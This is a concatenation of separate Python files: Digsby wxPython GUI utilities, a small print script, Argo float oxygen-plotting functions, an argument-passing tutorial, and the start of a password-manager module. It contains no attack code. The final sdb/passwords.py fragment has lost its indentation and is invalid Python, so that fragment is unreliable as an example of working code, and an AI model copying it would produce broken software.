            e.Skip()
            if e.EventObject is win:
                linked.unlink()

        win.Bind(wx.EVT_WINDOW_DESTROY, on_destroy)
    else:
        raise Exception('profile.prefs is empty -- cannot observe')
def setuplogging(logfilename='digsby-testapp.log', level=None):
    import logging
    if level is None:
        level = logging.DEBUG

    # Set up the log so it's visible
    logging.basicConfig(level=level,
                        filename=logfilename,
                        filemode='w')

    import logextensions
    console = logextensions.ColorStreamHandler()

    from main import ConsoleFormatter
    console.setFormatter(ConsoleFormatter())
    logging.getLogger().addHandler(console)
def OverflowShow(self, switch=True, genWidth=True):
    self.shouldshow = switch
    wx.Window.Show(self, switch)
    if genWidth:
        self.Parent.GenWidthRestriction(True)
def EnsureNotStacked(f, clz=None, offset=(20, 20)):
    '''
    Positions a top level window so that it is not directly stacked on
    top of another window for which isinstance(window, clz) is True.
    '''
    if clz is None:
        clz = f.__class__

    found = True
    top = GetTopLevelWindows()
    pos = f.Position

    while found:
        found = False
        for frame in top:
            if frame is not f and isinstance(frame, clz) and frame.IsShown() and frame.Position == pos:
                pos = pos + offset
                found = True

    f.Position = pos

wx.TopLevelWindow.EnsureNotStacked = EnsureNotStacked
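The cascade logic reduces to "shift by the offset until the position is free". A simplified pure-data sketch (`next_free_position` is an illustrative name; the real function rescans live windows each pass, which is equivalent when the set of occupied positions is static):

```python
def next_free_position(pos, taken, offset=(20, 20)):
    # keep shifting by `offset` until `pos` no longer collides
    while pos in taken:
        pos = (pos[0] + offset[0], pos[1] + offset[1])
    return pos

taken = {(100, 100), (120, 120)}
print(next_free_position((100, 100), taken))  # (140, 140)
```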
def AddInOrder(sizer, *order, **windows):
    if sizer and windows:
        for key in list(order):
            if key in windows:
                try:
                    sizer.Add(*windows[key])
                except Exception:
                    print >> sys.stderr, 'sizer', sizer
                    print >> sys.stderr, 'order', order
                    print >> sys.stderr, 'windows', windows
                    print >> sys.stderr, 'key', key
                    raise
def GetStartupDir():
    import stdpaths
    return stdpaths.userstartup

def ToScreen(rect, ctrl):
    r = wx.Rect(*rect)
    r.x, r.y = ctrl.ClientToScreen(r.TopLeft)
    return r

wx.Rect.ToScreen = ToScreen
from wx import TOP, BOTTOM, LEFT, RIGHT

def alignment_to_string(a):
    if a & TOP: s = 'upper'
    elif a & BOTTOM: s = 'lower'
    else: s = 'middle'

    if a & LEFT: s += 'left'
    elif a & RIGHT: s += 'right'
    else: s += 'center'

    return s
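The bit-flag decoding can be exercised without wx; the flag values below are illustrative only (wx's actual constants differ), and the demo names avoid shadowing the real imports:

```python
F_TOP, F_BOTTOM, F_LEFT, F_RIGHT = 0x1, 0x2, 0x4, 0x8  # illustrative values, not wx's

def alignment_to_string_demo(a):
    if a & F_TOP: s = 'upper'
    elif a & F_BOTTOM: s = 'lower'
    else: s = 'middle'
    if a & F_LEFT: s += 'left'
    elif a & F_RIGHT: s += 'right'
    else: s += 'center'
    return s

print(alignment_to_string_demo(F_TOP | F_RIGHT))  # upperright
print(alignment_to_string_demo(0))                # middlecenter
```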
def prnt(*a):
    """
    Converts the arguments to strings and prints them separated by spaces,
    in between two lines of 80 '=' characters.
    """
    print
    print '=' * 80
    print ' '.join(str(i) for i in a)
    print '=' * 80
if wxMSW:
    # use custom rich edit alignment flags -- wxLayoutDirection doesn't work
    # with rich text controls
    PFA_LEFT = 1
    PFA_RIGHT = 2
    PFA_CENTER = 3
    PFA_JUSTIFY = 4

    def set_rich_layoutdirection(ctrl, align):
        align = {wx.Layout_RightToLeft: PFA_RIGHT,
                 wx.Layout_LeftToRight: PFA_LEFT}[align]

        if cgui.SetRichEditParagraphAlignment(ctrl, align):
            ctrl.Refresh()

    def add_rtl_checkbox(ctrl, menu):
        '''
        Adds a checkbox when the menu is over the main input area for toggling
        a right to left reading order.

        ctrl is the control currently under the mouse
        menu is the menu we're updating
        '''
        # If we're over the main input area, add a checkbox for toggling RTL state.
        item = menu.AddCheckItem(_('Right To Left'), callback=lambda: toggle_layout_direction(ctrl))

        # The item is checked if RTL mode is on.
        item.Check(cgui.GetRichEditParagraphAlignment(ctrl) == PFA_RIGHT)

    def toggle_layout_direction(tc):
        'Toggles the layout direction of a control between right-to-left and left-to-right.'
        # alignment = PFA_RIGHT if cgui.GetRichEditParagraphAlignment(tc) == PFA_LEFT else PFA_LEFT
        #
        # if not cgui.SetRichEditParagraphAlignment(tc, alignment):
        #     log.warning('SetRichEditParagraphAlignment returned False')
        # else:
        #     tc.Refresh()
        tc.SetRTL(not tc.GetRTL())
else:
    def add_rtl_checkbox(ctrl, menu):
        '''
        Adds a checkbox when the menu is over the main input area for toggling
        a right to left reading order.

        ctrl is the control currently under the mouse
        menu is the menu we're updating
        '''
        # If we're over the main input area, add a checkbox for toggling RTL state.
        item = menu.AddCheckItem(_('Right To Left'), callback=lambda: toggle_layout_direction(ctrl))

        # The item is checked if RTL mode is on.
        item.Check(ctrl.GetRTL()) # LayoutDirection == wx.Layout_RightToLeft

    def toggle_layout_direction(tc):
        'Toggles the layout direction of a control between right-to-left and left-to-right.'
        if tc:
            tc.LayoutDirection = wx.Layout_RightToLeft if tc.LayoutDirection == wx.Layout_LeftToRight else wx.Layout_LeftToRight
            tc.Refresh()
def textctrl_hittest(txt, pos=None):
    if pos is None:
        pos = wx.GetMousePosition()

    hit, col, row = txt.HitTest(txt.ScreenToClient(pos))
    return txt.XYToPosition(col, row)
class Unshortener(object):
    def __init__(self, cb=None):
        self.urls = {}
        self.cb = cb

    def get_long_url(self, url):
        try:
            return self.urls[url]
        except KeyError:
            self.urls[url] = None

            def cb(longurl):
                self.urls[url] = longurl
                if self.cb:
                    self.cb()

            import util.net
            util.net.unshorten_url(url, cb)
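The class is a memoized asynchronous lookup: the first request marks the URL as pending (`None`) and kicks off a resolver, and later requests hit the cache. A self-contained sketch, where the injected `resolve` callable is an assumed stand-in for `util.net.unshorten_url` and the demo name avoids shadowing the real class:

```python
class UnshortenerDemo(object):
    """Cache of short url -> long url; None marks a lookup still in flight."""
    def __init__(self, resolve, on_update=None):
        # `resolve(url, callback)` stands in for util.net.unshorten_url
        self.urls = {}
        self.resolve = resolve
        self.on_update = on_update

    def get_long_url(self, url):
        try:
            return self.urls[url]
        except KeyError:
            self.urls[url] = None  # mark pending so we only resolve once

            def done(longurl):
                self.urls[url] = longurl
                if self.on_update:
                    self.on_update()

            self.resolve(url, done)

# a synchronous stub resolver; the real one hits the network asynchronously
u = UnshortenerDemo(lambda url, cb: cb('http://example.com/very/long/path'))
first = u.get_long_url('http://sho.rt/x')        # kicks off the lookup, returns None
print(u.get_long_url('http://sho.rt/x'))         # http://example.com/very/long/path
```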
def add_shortened_url_tooltips(txt):
    '''
    binds a mouse motion handler that detects when the mouse hovers over
    shortened urls, and shows the long version
    '''
    def update_url_tooltip(e=None):
        if e is not None:
            e.Skip()

        val = txt.Value
        import util.net
        i = textctrl_hittest(txt)
        tooltip = None

        for link, span in util.net.LinkAccumulator(val):
            if i < span[0] or i >= span[1]:
                continue
            if util.net.is_short_url(link):
                try:
                    shortener = txt._url_unshortener
                except AttributeError:
                    shortener = txt._url_unshortener = Unshortener(lambda: wx.CallAfter(update_url_tooltip))
                tooltip = shortener.get_long_url(link)
            break

        update_tooltip(txt, tooltip)

    txt.Bind(wx.EVT_MOTION, update_url_tooltip)
def maybe_add_shorten_link(txt, menu):
    import util.net

    val = txt.Value
    i = textctrl_hittest(txt) # TODO: what if the menu was spawned via the keyboard?

    for link, span in util.net.LinkAccumulator(val):
        if i < span[0] or i >= span[1]:
            continue

        def repl(s):
            i, j = span
            txt.Value = ''.join((val[:i], s, val[j:]))

        if util.net.is_short_url(link):
            longurl = util.net.long_url_from_cache(link)
            if longurl is not None:
                menu.AddItem(_('Use Long URL'), callback=lambda: repl(longurl))
                menu.AddSep()
            continue

        @util.threaded
        def bgthread():
            url = util.net.get_short_url(link)
            if url and val == txt.Value:
                wx.CallAfter(lambda: repl(url))

        menu.AddItem(_('Shorten URL'), callback=bgthread)
        menu.AddSep()
        break
def show_sizers(win, stream=None):
    if isinstance(win, wx.WindowClass):
        sizer = win.Sizer
        if sizer is None:
            raise ValueError('%r has no sizer' % win)
    elif isinstance(win, wx.Sizer):
        sizer = win
    else:
        raise TypeError('must pass a window or sizer, you gave %r' % win)

    if stream is None:
        stream = sys.stdout

    _print_sizer(sizer, stream)

def _shownstr(o):
    return '(hidden)' if not o.IsShown() else ''

def _print_sizer(sizer, stream, indent='', sizer_shown_str=''):
    assert isinstance(sizer, wx.Sizer)
    stream.write(''.join([indent, repr(sizer), ' ', sizer_shown_str, '\n']))
    indent = '    ' + indent

    for child in sizer.Children:
        assert isinstance(child, wx.SizerItem)
        if child.Sizer is not None:
            _print_sizer(child.Sizer, stream, '    ' + indent, sizer_shown_str=_shownstr(child))
        else:
            stream.write(''.join([indent,
                                  repr(child.Window if child.Window is not None else child.Spacer),
                                  ' ',
                                  _shownstr(child),
                                  '\n']))
_delays = defaultdict(lambda: (0, None))

def calllimit(secs=.5):
    '''
    Ensures a function will be called at most once every "secs" seconds.

    If a new call comes in while a "delay" is occurring, the function is
    guaranteed to be called after the delay is over.
    '''
    def inner(func): # argument to the decorator: a function
        @functools.wraps(func)
        def wrapper(*args, **kwargs): # arguments to the original function
            now = time_clock()
            key = (func, getattr(func, 'im_self', None))
            lastcalled, caller = _delays[key]
            diff = now - lastcalled

            if diff > secs:
                # CALL NOW
                if isinstance(caller, wx.CallLater): caller.Stop()
                _delays[key] = (now, None)
                return func(*args, **kwargs)
            else:
                # CALL LATER
                if caller == 'pending':
                    # the wx.CallAfter hasn't completed yet.
                    pass
                elif not caller:
                    callin_ms = (lastcalled + secs - now) * 1000

                    def later():
                        def muchlater():
                            _delays[key] = (time_clock(), None)
                            func(*args, **kwargs)
                        _delays[key] = (lastcalled,
                                        wx.CallLater(max(1, callin_ms), muchlater))

                    _delays[key] = (lastcalled, 'pending')
                    wx.CallAfter(later)

            return func
        return wrapper
    return inner
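The core idea is a time-window gate around the wrapped function. A deliberately simplified Python 3 sketch (`calllimit_demo` is an illustrative name; unlike the wx version above, calls arriving inside the window are simply dropped rather than replayed after the delay):

```python
import time
import functools

def calllimit_demo(secs=0.5):
    def inner(func):
        last = [0.0]  # time of the last accepted call
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            now = time.monotonic()
            if now - last[0] > secs:
                last[0] = now
                return func(*args, **kwargs)
            # inside the window: the call is dropped
        return wrapper
    return inner

calls = []

@calllimit_demo(0.2)
def ping(x):
    calls.append(x)

ping(1); ping(2)       # the second call is inside the window and dropped
time.sleep(0.25)
ping(3)
print(calls)           # [1, 3]
```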
# TODO: move me to gui.native
GetDoubleClickTime = lambda: 600

if wxMSW:
    try:
        from ctypes import windll
        GetDoubleClickTime = windll.user32.GetDoubleClickTime
    except Exception:
        print_exc()
def std_textctrl_menu(txt, menu):
    menu.AddItem(_("Undo"), callback=txt.Undo, id=wx.ID_UNDO)
    menu.Enable(wx.ID_UNDO, txt.CanUndo())
    menu.AddItem(_("Redo"), callback=txt.Redo, id=wx.ID_REDO)
    menu.Enable(wx.ID_REDO, txt.CanRedo())

    menu.AppendSeparator()

    menu.AddItem(_("Cut"), callback=txt.Cut, id=wx.ID_CUT)
    menu.Enable(wx.ID_CUT, txt.CanCut())
    menu.AddItem(_("Copy"), callback=txt.Copy, id=wx.ID_COPY)
    menu.Enable(wx.ID_COPY, txt.CanCopy())
    menu.AddItem(_("Paste"), callback=txt.Paste, id=wx.ID_PASTE)
    menu.Enable(wx.ID_PASTE, txt.CanPaste())

    menu.AppendSeparator()

    menu.AddItem(_("Select All"), callback=lambda: txt.SetSelection(0, txt.GetLastPosition()), id=wx.ID_SELECTALL)
IMAGE_WILDCARD = ('Image files (*.gif;*.jpeg;*.jpg;*.png)|*.gif;*.jpeg;*.jpg;*.png|'
                  'All files (*.*)|*.*')

def pick_image_file(parent):
    diag = wx.FileDialog(parent, _('Select an image file'),
                         wildcard=IMAGE_WILDCARD)
    filename = None
    try:
        status = diag.ShowModal()
        if status == wx.ID_OK:
            filename = diag.Path
    finally:
        diag.Destroy()

    return filename
def paint_outline(dc, control, color=None, border=1):
    if color is None:
        color = wx.Color(213, 213, 213)

    dc.Brush = wx.TRANSPARENT_BRUSH
    dc.Pen = wx.Pen(color)

    r = control.Rect
    r.Inflate(border, border)
    dc.DrawRectangleRect(r)

def maybe_callable(val):
    return val if not callable(val) else val()
def insert_text(textctrl, text):
    ip = textctrl.InsertionPoint
    if ip != 0 and textctrl.Value[ip-1] and textctrl.Value[ip-1] != ' ':
        textctrl.WriteText(' ')
    textctrl.WriteText(text + ' ')
def insert_shortened_url(textctrl, url, ondone=None, timeoutms=5000):
    import util.net

    textctrl.Freeze()
    textctrl.Enable(False)

    class C(object): pass
    c = C()
    c._finished = False

    def finish(shorturl=None):
        if c._finished:
            return
        c._finished = True

        insert_text(textctrl, shorturl or url)
        textctrl.Thaw()
        textctrl.Enable()
        textctrl.SetFocus()

        if ondone is not None:
            ondone(shorturl)

    def get():
        short_url = None
        with util.traceguard:
            short_url = util.net.get_short_url(url)

        # don't use a "short" url that is actually longer than the original
        if short_url is not None and len(short_url) >= len(url):
            short_url = url

        wx.CallAfter(lambda: finish(short_url))

    util.threaded(get)()

    if timeoutms is not None:
        wx.CallLater(timeoutms, finish)

    def cancel(): finish(None)
    return cancel
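The `_finished` flag makes `finish` idempotent, so whichever of the worker thread, the timeout, or a cancel arrives first wins and the rest are no-ops. That pattern in isolation (`make_once` is an illustrative helper name):

```python
def make_once(fn):
    # wrap fn so only the first caller (worker thread OR timeout) runs it
    state = {'done': False}
    def once(*args, **kwargs):
        if state['done']:
            return
        state['done'] = True
        return fn(*args, **kwargs)
    return once

hits = []
finish = make_once(hits.append)
finish('http://sho.rt/x')  # the background thread finishes first...
finish(None)               # ...so the later timeout call is ignored
print(hits)  # ['http://sho.rt/x']
```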
def bind_special_paste(textctrl, shorten_urls=True, onbitmap=None, onfilename=None,
                       onshorten=None, onshorten_done=None):
    import gui.clipboard as clipboard

    def on_text_paste(e):
        if e.EventObject is not textctrl:
            return e.Skip()

        if onfilename is not None:
            files = clipboard.get_files() or []
            for file in files:
                if file.isfile():
                    if onfilename(file) is False:
                        e.Skip()
                    return

        if maybe_callable(shorten_urls):
            text = clipboard.get_text()
            if text is not None:
                import util.net
                if util.isurl(text) and not util.net.is_short_url(text):
                    cancellable = insert_shortened_url(textctrl, text, ondone=onshorten_done)
                    if onshorten is not None:
                        onshorten(cancellable)
                else:
                    e.Skip()
                return

        if onbitmap is not None:
            bitmap = clipboard.get_bitmap()
            if bitmap is not None:
                import stdpaths, time
                filename = stdpaths.temp / 'digsby.clipboard.%s.png' % time.time()
                bitmap.SaveFile(filename, wx.BITMAP_TYPE_PNG)
                if onbitmap(filename, bitmap) is False:
                    e.Skip()
                return

        e.Skip()

    textctrl.Bind(wx.EVT_TEXT_PASTE, on_text_paste)
def HelpLink(parent, url):
    sz = wx.BoxSizer(wx.HORIZONTAL)

    txt_left = wx.StaticText(parent, label=u' [')
    link = wx.HyperlinkCtrl(parent, -1, label=u' ? ', url=url)
    txt_right = wx.StaticText(parent, label=u']')

    sz.Add(txt_left, flag=wx.ALIGN_CENTER_VERTICAL)
    sz.Add(link, flag=wx.ALIGN_CENTER_VERTICAL)
    sz.Add(txt_right, flag=wx.ALIGN_CENTER_VERTICAL)

    return sz
def update_tooltip(ctrl, tip):
    '''Only updates a control's tooltip if it's different.'''
    if tip is None:
        if ctrl.ToolTip is not None:
            ctrl.SetToolTip(None)
    else:
        if ctrl.ToolTip is None:
            ctrl.SetToolTipString(tip)
        elif ctrl.ToolTip.Tip != tip:
            ctrl.ToolTip.SetTip(tip)
class tempdc(object):
    def __init__(self, width, height, transparent=True):
        self.width = width
        self.height = height
        self.transparent = transparent

    def __enter__(self):
        self.bitmap = wx.TransparentBitmap(self.width, self.height)
        self.dc = wx.MemoryDC(self.bitmap)
        return self.dc, self.bitmap

    def __exit__(self, exc, val, tb):
        self.dc.SelectObject(wx.NullBitmap)
# === print1.py (repo: shubhamm033/googlepython) ===

#!/usr/bin/python -tt
import sys

def repeat(name, age):
    if name == 'Guido' or age == 2:
        print 10
    else:
        print 101

def main():
    repeat(sys.argv[1], sys.argv[2])

if __name__ == '__main__':
    main()

# === fplt.py (repo: ArgoCanada/bgcArgoDMQC) ===

import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates

import seaborn as sns
sns.set(style='ticks', context='paper', palette='colorblind')

try:
    import cmocean.cm as cmo
    cmocean_flag = True
except:
    cmocean_flag = False
class pltClass:
    def __init__(self):
        self.__info__ = 'Python qc package plt class'
def float_ncep_inair(sdn, flt, ncep, ax=None, legend=True):
    if ax is None:
        fig, ax = plt.subplots()
    else:
        fig = ax.get_figure()

    ax.plot(sdn, flt, linewidth=2, label='Float')
    ax.plot(sdn, ncep, linewidth=2, label='NCEP')

    if legend:
        ax.legend(loc=3)

    mhr = mdates.MonthLocator(interval=4)
    mihr = mdates.MonthLocator()
    fmt = mdates.DateFormatter('%b %Y')

    ax.xaxis.set_major_locator(mhr)
    ax.xaxis.set_major_formatter(fmt)
    ax.xaxis.set_minor_locator(mihr)

    ax.set_ylabel('pO$_2$ (mbar)')

    for tick in ax.get_xticklabels():
        tick.set_rotation(45)

    g = pltClass()
    g.fig = fig
    g.axes = [ax]

    return g
def float_woa_surface(sdn, flt, woa, ax=None, legend=True):
    if ax is None:
        fig, ax = plt.subplots()
    else:
        fig = ax.get_figure()

    ax.plot(sdn, flt, linewidth=2, label='Float')
    ax.plot(sdn, woa, linewidth=2, label='WOA18')

    if legend:
        ax.legend(loc=3)

    mhr = mdates.MonthLocator(interval=4)
    mihr = mdates.MonthLocator()
    fmt = mdates.DateFormatter('%b %Y')

    ax.xaxis.set_major_locator(mhr)
    ax.xaxis.set_major_formatter(fmt)
    ax.xaxis.set_minor_locator(mihr)

    ax.set_ylabel('O$_2$ Saturation %')

    for tick in ax.get_xticklabels():
        tick.set_rotation(45)

    g = pltClass()
    g.fig = fig
    g.axes = [ax]

    return g
def gains(sdn, gains, inair=True, ax=None, legend=True):
    if ax is None:
        fig, ax = plt.subplots()
    else:
        fig = ax.get_figure()

    ax.plot(sdn, gains, 'o', markeredgewidth=0.5, markersize=5, markeredgecolor='grey', zorder=3, label='Gains')
    ax.axhline(np.nanmean(gains), color='k', linestyle='--', label='Mean = {:.2f}'.format(np.nanmean(gains)), zorder=2)
    ax.axhline(1.0, color='k', linestyle='-', linewidth=0.5, label=None, zorder=1)

    if legend:
        ax.legend(loc=3)

    mhr = mdates.MonthLocator(interval=4)
    mihr = mdates.MonthLocator()
    fmt = mdates.DateFormatter('%b %Y')

    ax.xaxis.set_major_locator(mhr)
    ax.xaxis.set_major_formatter(fmt)
    ax.xaxis.set_minor_locator(mihr)

    ax.set_ylabel('O$_2$ Gain (unitless)')

    for tick in ax.get_xticklabels():
        tick.set_rotation(45)

    g = pltClass()
    g.fig = fig
    g.axes = [ax]

    return g
def gainplot(sdn, float_data, ref_data, gainvals, ref):
    fig, axes = plt.subplots(2, 1, sharex=True)

    if ref == 'NCEP':
        g1 = float_ncep_inair(sdn, float_data, ref_data, ax=axes[0])
        g2 = gains(sdn, gainvals, inair=False, ax=axes[1])
    elif ref == 'WOA':
        g1 = float_woa_surface(sdn, float_data, ref_data, ax=axes[0])
        g2 = gains(sdn, gainvals, inair=False, ax=axes[1])

    g = pltClass()
    g.fig = fig
    g.axes = axes

    return g
def var_cscatter(df, varname='DOXY', cmap=None, ax=None, ylim=(0, 2000), clabel=None, vmin=None, vmax=None, **kwargs):
    # define colormaps
    if cmocean_flag:
        color_maps = dict(
            TEMP=cmo.thermal,
            TEMP_ADJUSTED=cmo.thermal,
            PSAL=cmo.haline,
            PSAL_ADJUSTED=cmo.haline,
            PDEN=cmo.dense,
            CHLA=cmo.algae,
            CHLA_ADJUSTED=cmo.algae,
            BBP700=cmo.matter,
            BBP700_ADJUSTED=cmo.matter,
            DOXY=cmo.ice,
            DOXY_ADJUSTED=cmo.ice,
            DOWNWELLING_IRRADIANCE=cmo.solar,
        )
    else:
        color_maps = dict(
            TEMP=plt.cm.inferno,
            TEMP_ADJUSTED=plt.cm.inferno,
            PSAL=plt.cm.viridis,
            PSAL_ADJUSTED=plt.cm.viridis,
            PDEN=plt.cm.cividis,
            CHLA=plt.cm.YlGn,
            CHLA_ADJUSTED=plt.cm.YlGn,
            BBP700=plt.cm.pink_r,
            BBP700_ADJUSTED=plt.cm.pink_r,
            DOXY=plt.cm.YlGnBu_r,
            DOXY_ADJUSTED=plt.cm.YlGnBu_r,
            DOWNWELLING_IRRADIANCE=plt.cm.magma,
        )

    if clabel is None:
        var_units = dict(
            TEMP='Temperature ({}C)'.format(chr(176)),
            TEMP_ADJUSTED='Temperature ({}C)'.format(chr(176)),
            PSAL='Practical Salinity',
            PSAL_ADJUSTED='Practical Salinity',
            PDEN='Potential Density (kg m$^{-3}$)',
            CHLA='Chlorophyll (mg m$^{-3}$)',
            CHLA_ADJUSTED='Chlorophyll (mg m$^{-3}$)',
            BBP700='$\mathsf{b_{bp}}$ (m$^{-1}$)',
            BBP700_ADJUSTED='$\mathsf{b_{bp}}$ (m$^{-1}$)',
            DOXY='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
            DOXY_ADJUSTED='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
            DOWNWELLING_IRRADIANCE='Downwelling Irradiance (W m$^{-2}$)',
        )
        clabel = var_units[varname]

    if cmap is None:
        cmap = color_maps[varname]

    if ax is None:
        fig, ax = plt.subplots()
    else:
        fig = ax.get_figure()

    df = df.loc[df.PRES < ylim[1] + 50]

    if vmin is None:
        vmin = 1.05*df[varname].min()
    if vmax is None:
        vmax = 0.95*df[varname].max()

    im = ax.scatter(df.SDN, df.PRES, c=df[varname], s=50, cmap=cmap, vmin=vmin, vmax=vmax, **kwargs)

    cb = plt.colorbar(im, ax=ax)
    cb.set_label(clabel)

    ax.set_ylim(ylim)
    ax.invert_yaxis()
    ax.set_ylabel('Depth (dbar)')

    w, h = fig.get_figwidth(), fig.get_figheight()
    fig.set_size_inches(w*2, h)

    mhr = mdates.MonthLocator(interval=4)
    mihr = mdates.MonthLocator()
    fmt = mdates.DateFormatter('%b %Y')

    ax.xaxis.set_major_locator(mhr)
    ax.xaxis.set_major_formatter(fmt)
    ax.xaxis.set_minor_locator(mihr)

    g = pltClass()
    g.fig = fig
    g.axes = [ax]
    g.cb = cb

    return g
def profiles(df, varlist=['DOXY'], Ncycle=1, Nprof=np.inf, zvar='PRES', xlabels=None, ylabel=None, axes=None, ylim=None, **kwargs):
    if xlabels is None:
        var_units = dict(
            TEMP='Temperature ({}C)'.format(chr(176)),
            TEMP_ADJUSTED='Temperature ({}C)'.format(chr(176)),
            PSAL='Practical Salinity',
            PSAL_ADJUSTED='Practical Salinity',
            PDEN='Potential Density (kg m$^{-3}$)',
            CHLA='Chlorophyll (mg m$^{-3}$)',
            CHLA_ADJUSTED='Chlorophyll (mg m$^{-3}$)',
            BBP700='$\mathsf{b_{bp}}$ (m$^{-1}$)',
            BBP700_ADJUSTED='$\mathsf{b_{bp}}$ (m$^{-1}$)',
            CDOM='CDOM (mg m$^{-3}$)',
            CDOM_ADJUSTED='CDOM (mg m$^{-3}$)',
            DOXY='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
            DOXY_ADJUSTED='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
            DOWNWELLING_IRRADIANCE='Downwelling Irradiance (W m$^{-2}$)',
        )
        xlabels = [var_units[v] if v in var_units.keys() else '' for v in varlist]

    cm = plt.cm.gray_r

    if axes is None:
        fig, axes = plt.subplots(1, len(varlist), sharey=True)
        if len(varlist) == 1:
            axes = [axes]
    elif len(varlist) > 1:
        fig = axes[0].get_figure()
    else:
        fig = axes.get_figure()
        axes = [axes]

    if ylim is None:
        if zvar == 'PRES':
            ylim = (0, 2000)
            if ylabel is None:
                ylabel = 'Pressure (dbar)'
        elif zvar == 'PDEN':
            ylim = (df.PDEN.min(), df.PDEN.max())
            if ylabel is None:
                ylabel = 'Density (kg m$^{-3}$)'

    df.loc[df[zvar] > ylim[1]*1.1] = np.nan

    CYCNUM = df.CYCLE.unique()
    greyflag = False
    if not 'color' in kwargs.keys():
        greyflag = True
    else:
        c = kwargs.pop('color')

    if Nprof > CYCNUM.shape[0]:
        Nprof = CYCNUM.shape[0]

    for i, v in enumerate(varlist):
        for n in range(Nprof):
            subset_df = df.loc[df.CYCLE == CYCNUM[Ncycle-1 + n-1]]
            if greyflag:
                c = cm(0.75*(CYCNUM[Ncycle-1 + n-1]/CYCNUM[-1]) + 0.25)
            axes[i].plot(subset_df[v], subset_df[zvar], color=c, **kwargs)

        axes[i].set_ylim(ylim[::-1])
        axes[i].set_xlabel(xlabels[i])

    subset_df = df.loc[df.CYCLE == CYCNUM[Ncycle-1]]
    date = mdates.num2date(subset_df.SDN.iloc[0]).strftime('%d %b, %Y')

    axes[0].set_ylabel(ylabel)

    if Nprof != 1:
        axes[0].set_title('Cyc. {:d}-{:d}, {}'.format(int(CYCNUM[Ncycle-1]), int(CYCNUM[Ncycle-1+Nprof-1]), date))
    else:
        axes[0].set_title('Cyc. {:d}, {}'.format(int(CYCNUM[Ncycle-1]), date))

    w, h = fig.get_figwidth(), fig.get_figheight()
    fig.set_size_inches(w*len(varlist)/3, h)

    g = pltClass()
    g.fig = fig
    g.axes = axes

    return g
def qc_profiles(df, varlist=['DOXY'], Ncycle=1, Nprof=np.inf, zvar='PRES', xlabels=None, ylabel=None, axes=None, ylim=None, **kwargs):
    if xlabels is None:
        var_units = dict(
            TEMP='Temperature ({}C)'.format(chr(176)),
            TEMP_ADJUSTED='Temperature ({}C)'.format(chr(176)),
            PSAL='Practical Salinity',
            PSAL_ADJUSTED='Practical Salinity',
            PDEN='Potential Density (kg m$^{-3}$)',
            CHLA='Chlorophyll (mg m$^{-3}$)',
            CHLA_ADJUSTED='Chlorophyll (mg m$^{-3}$)',
            BBP700='$\mathsf{b_{bp}}$ (m$^{-1}$)',
            BBP700_ADJUSTED='$\mathsf{b_{bp}}$ (m$^{-1}$)',
            CDOM='CDOM (mg m$^{-3}$)',
            CDOM_ADJUSTED='CDOM (mg m$^{-3}$)',
            DOXY='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
            DOXY_ADJUSTED='Diss. Oxygen ($\mathregular{\mu}$mol kg$^{-1}$)',
            DOWNWELLING_IRRADIANCE='Downwelling Irradiance (W m$^{-2}$)',
        )
        xlabels = [var_units[v] for v in varlist]

    if axes is None:
        fig, axes = plt.subplots(1, len(varlist), sharey=True)
        if len(varlist) == 1:
            axes = [axes]
    elif len(varlist) > 1:
        fig = axes[0].get_figure()
    else:
        fig = axes.get_figure()
        axes = [axes]

    if ylim is None:
        if zvar == 'PRES':
            ylim = (0, 2000)
            if ylabel is None:
                ylabel = 'Pressure (dbar)'
        elif zvar == 'PDEN':
            ylim = (df.PDEN.min(), df.PDEN.max())
            if ylabel is None:
                ylabel = 'Density (kg m$^{-3}$)'

    df.loc[df[zvar] > ylim[1]*1.1] = np.nan

    CYCNUM = df.CYCLE.unique()
    if Nprof > CYCNUM.shape[0]:
        Nprof = CYCNUM.shape[0]

    groups = {'Good':[1, 2, 5], 'Probably Bad':[3], 'Bad':[4], 'Interpolated':[8]}
    colors = {'Good':'green', 'Probably Bad':'yellow', 'Bad':'red', 'Interpolated':'blue'}

    for i, v in enumerate(varlist):
        vqc = v + '_QC'
        for n in range(Nprof):
            subset_df = df.loc[df.CYCLE == CYCNUM[Ncycle-1 + n-1]]
            for k, f in groups.items():
                flag_subset_df = subset_df[subset_df[vqc].isin(f)]
                axes[i].plot(flag_subset_df[v], flag_subset_df[zvar], 'o', markeredgewidth=0.1, markeredgecolor='k', markerfacecolor=colors[k], **kwargs)

        axes[i].set_ylim(ylim[::-1])
        axes[i].set_xlabel(xlabels[i])

    subset_df = df.loc[df.CYCLE == CYCNUM[Ncycle-1]]
    date = mdates.num2date(subset_df.SDN.iloc[0]).strftime('%d %b, %Y')

    axes[0].set_ylabel(ylabel)

    if Nprof != 1:
        axes[0].set_title('Cyc. {:d}-{:d}, {}'.format(int(CYCNUM[Ncycle-1]), int(CYCNUM[Ncycle-1+Nprof-1]), date))
    else:
        axes[0].set_title('Cyc. {:d}, {}'.format(int(CYCNUM[Ncycle-1]), date))

    w, h = fig.get_figwidth(), fig.get_figheight()
    fig.set_size_inches(w*len(varlist)/3, h)

    g = pltClass()
    g.fig = fig
    g.axes = axes

    return g
# === 2-arguments.py (repo: rpotter12/learning-python) ===

# *args - arguments - it returns tuple
# **kwargs - keyword arguments - it returns dictionary

def myfunc(*args):
    print(args)

myfunc(1, 2, 3, 4, 5, 6, 7, 8, 9, 0)

def myfunc1(**kwargs):
    print(kwargs)
    if 'fruit' in kwargs:
        print('my fruit of choice is {}'.format(kwargs['fruit']))
    else:
        print('I did not find any fruit here')

myfunc1(fruit='apple', veggie='lettuce')
# === sdb/passwords.py (repo: gavinwahl/sdb) ===

import os
import ast
import sys
import math
import time
import string
import hashlib
import tempfile
import subprocess
from operator import itemgetter
from contextlib import contextmanager
from getpass import getpass
import random; random = random.SystemRandom()
import sdb.subprocess_compat as subprocess
from sdb.util import force_bytes
from sdb.clipboard import set_clipboard_once, ClipboardException
from sdb.diceware import WORDS
from sdb import gpg_agent
def encode(records):
res = []
for record in records:
res.append(repr(record))
return ('\n'.join(res) + '\n').encode('utf-8')
def decode(str):
records = []
for line in str.decode('utf-8').split('\n'):
if line:
records.append(ast.literal_eval(line))
return records
CASE_ALPHABET = string.ascii_letters
